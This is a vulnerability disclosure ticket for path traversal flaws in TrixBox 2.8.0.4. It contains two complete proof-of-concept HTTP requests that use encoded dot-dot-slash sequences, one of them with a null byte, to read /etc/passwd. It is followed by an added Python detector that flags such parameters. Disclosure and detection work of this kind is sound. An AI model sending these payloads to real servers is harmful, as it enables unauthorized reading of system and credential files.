#236 TrixBox Multiple Path Traversal Vulnerabilities

v1.0 (example)
open
agillis
5
2018-05-28
2018-05-28
sachin
No

Vulnerability Title: TrixBox Multiple Path Traversal Vulnerabilities
Affected Product: trixbox-2.8.0.4
Product Page: https://sourceforge.net/projects/asteriskathome/
CVSSv2 Base Score: (AV:N/AC:M/Au:S/C:C/I:N/A:N) Severity: Medium
Solution Status: N/A
Credit: Sachin Wagh (@tiger_tigerboy)


Description:
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. (Source: OWASP).
Impact:
Remote attackers may use a specially crafted request with directory-traversal sequences ('../') to retrieve sensitive information.

Proof-of-Concept:

  • Affected Request -1:

POST /maint/index.php?packages HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Method: POST http://192.168.0.6/maint/index.php?packages HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.6/maint/index.php?packages
Content-Length: 160
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive

xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages

  • Affected Request -2:

GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.6/maint/
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Please fix it ASAP.

Credit:
Sachin Wagh (@tiger_tigerboy)

2 Attachments
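
Added example (not part of the original report and not TrixBox code): a detection check that can be run over logged query strings and form bodies to flag the request shapes shown above. The sample inputs are constructed and shortened from the two requests; the function names and reason labels are assumptions made for this illustration.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qsl, unquote

# Constructed samples modelled on the two requests in this report (shortened).
REQUEST_1_BODY = ("xajax=menu&xajaxr=1504969293893"
                  "&xajaxargs[]=..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages")
REQUEST_2_QUERY = "lang=..%2f..%2f..%2fetc%2fpasswd%00english"

TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")   # a ".." path segment
ABSOLUTE = re.compile(r"^([\\/]|[A-Za-z]:[\\/])")    # /etc/... or C:\...
MAX_DECODE_ROUNDS = 3  # bounded, so nested encoding cannot loop forever


def fully_decode(value: str) -> str:
    """Percent-decode until stable, to catch double encoding (%252e%252e%252f)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_value(value: str) -> set[str]:
    """Return the reasons one parameter value looks like a traversal attempt."""
    decoded = fully_decode(value)
    reasons = set()
    if TRAVERSAL.search(decoded):
        reasons.add("dot-dot-slash")
    if "\x00" in decoded:
        reasons.add("null-byte")      # the %00 before "english" in request 2
    if ABSOLUTE.match(decoded):
        reasons.add("absolute-path")
    return reasons


def scan_request(query: str, body: str = "") -> dict[str, list[str]]:
    """Map each suspicious parameter (query string or form body) to its reasons."""
    findings: dict[str, set[str]] = {}
    for raw in (query, body):
        # parse_qsl performs the first round of percent-decoding itself.
        for name, value in parse_qsl(raw, keep_blank_values=True):
            reasons = check_value(value)
            if reasons:
                findings.setdefault(name, set()).update(reasons)
    return {name: sorted(r) for name, r in findings.items()}


if __name__ == "__main__":
    print(scan_request("packages", REQUEST_1_BODY))
    print(scan_request(REQUEST_2_QUERY))
```

The absolute-path rule is noisy on parameters that legitimately carry URL paths, so scope it to parameters that select files.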
